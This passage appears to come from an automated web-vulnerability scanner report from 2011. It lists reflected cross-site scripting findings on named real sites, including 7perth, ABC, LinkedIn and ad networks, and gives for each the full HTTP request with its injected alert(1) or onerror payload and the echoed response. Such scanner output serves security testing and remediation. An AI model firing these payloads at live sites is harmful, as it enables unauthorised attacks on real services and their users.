This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/2/?f4033<a>d6e90fbbbbf=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:24:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 13878


Warning: simplexml_load_string(): Entity: line 3: parser error : error parsing attribute name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_load
...[SNIP]...
<f4033<a>d6e90fbbbbf>
...[SNIP]...

2.72. http://www.7perth.com.au/view/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.7perth.com.au
Path:   /view/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32723<a>d6ae782955f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/about/?32723<a>d6ae782955f=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:24:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 10558


Warning: simplexml_load_string(): Entity: line 3: parser error : StartTag: invalid element name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_lo
...[SNIP]...
<32723<a>d6ae782955f>
...[SNIP]...

2.73. http://www.7perth.com.au/view/seven-news/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.7perth.com.au
Path:   /view/seven-news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0854<a>a3548ec987a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/seven-news/?b0854<a>a3548ec987a=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 13878


Warning: simplexml_load_string(): Entity: line 3: parser error : error parsing attribute name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_load
...[SNIP]...
<b0854<a>a3548ec987a>
...[SNIP]...

2.74. http://www.abc.net.au/perth/news/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /perth/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b8ad'-alert(1)-'9ea4dc44988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /perth/news/?2b8ad'-alert(1)-'9ea4dc44988=1 HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=420
Expires: Wed, 07 Sep 2011 14:21:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 48900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www2b.abc.net.au/communities/asp/register.asp?from=/perth/news/?2b8ad'-alert(1)-'9ea4dc44988=1" class="gen_color1">
...[SNIP]...

2.75. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload a7c92<img%20src%3da%20onerror%3dalert(1)>4d3bd15827 was submitted in the url parameter. This input was echoed as a7c92<img src=a onerror=alert(1)>4d3bd15827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.perthnow.com.au%2Fbusiness%2Fbusiness-old%2Ffraud-blackmail-in-latest-oswal-claims%2Fstory-e6frg2qu-1226131700884a7c92<img%20src%3da%20onerror%3dalert(1)>4d3bd15827 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html?url=http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:31:26 GMT
Content-Length: 213

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.perthnow.com.au\/business\/business-old\/fraud-blackmail-in-latest-oswal-claims\/story-e6frg2qu-1226131700884a7c92<img src=a onerror=alert(1)>4d3bd15827"});

2.76. http://adnxs.revsci.net/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf24'-alert(1)-'b7c07369c41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3bf24'-alert(1)-'b7c07369c41
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:17:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:17:09 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=3bf24'-alert(1)-'b7c07369c41&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%252F%252Foptimized-by
...[SNIP]...

2.77. http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.mycareer.com.au
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93b1b'style%3d'x%3aexpression(alert(1))'b331857517d was submitted in the REST URL parameter 1. This input was echoed as 93b1b'style='x:expression(alert(1))'b331857517d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /crossdomain.xml93b1b'style%3d'x%3aexpression(alert(1))'b331857517d HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 517
Content-Type: text/html; charset=utf-8
Location: http://syndication.mycareer.com.au/crossdomain.xml93b1b'style='x:expression(alert(1))'b331857517d
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU"><head
...[SNIP]...
<a href='http://syndication.mycareer.com.au/crossdomain.xml93b1b'style='x:expression(alert(1))'b331857517d'>
...[SNIP]...

2.78. http://feeds.mycareer.com.au/jobresults [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.mycareer.com.au
Path:   /jobresults

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bedc'style%3d'x%3aexpression(alert(1))'3c198456447 was submitted in the REST URL parameter 1. This input was echoed as 4bedc'style='x:expression(alert(1))'3c198456447 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /4bedc'style%3d'x%3aexpression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 546
Content-Type: text/html; charset=utf-8
Location: http://syndication.mycareer.com.au/4bedc'style='x:expression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:20:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU"><head
...[SNIP]...
<a href='http://syndication.mycareer.com.au/4bedc'style='x:expression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml'>
...[SNIP]...

2.79. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee5d"-alert(1)-"91ff5e258ee was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=9ee5d"-alert(1)-"91ff5e258ee; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:28 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:28 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:28 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^129; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63931; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3239

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9ee5d"-alert(1)-"91ff5e258ee\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.80. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa71f"-alert(1)-"0030f063de1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/21770-2.js?cb=69135394&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=aa71f"-alert(1)-"0030f063de1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^9; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63940; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3239

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=aa71f"-alert(1)-"0030f063de1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.81. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b2e"-alert(1)-"a79f1d07a25 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=63b2e"-alert(1)-"a79f1d07a25; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:32:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:32:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:32:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^96&12590^119; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62864; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3199

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=63b2e"-alert(1)-"a79f1d07a25\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.82. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb08b"-alert(1)-"f87da27032a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
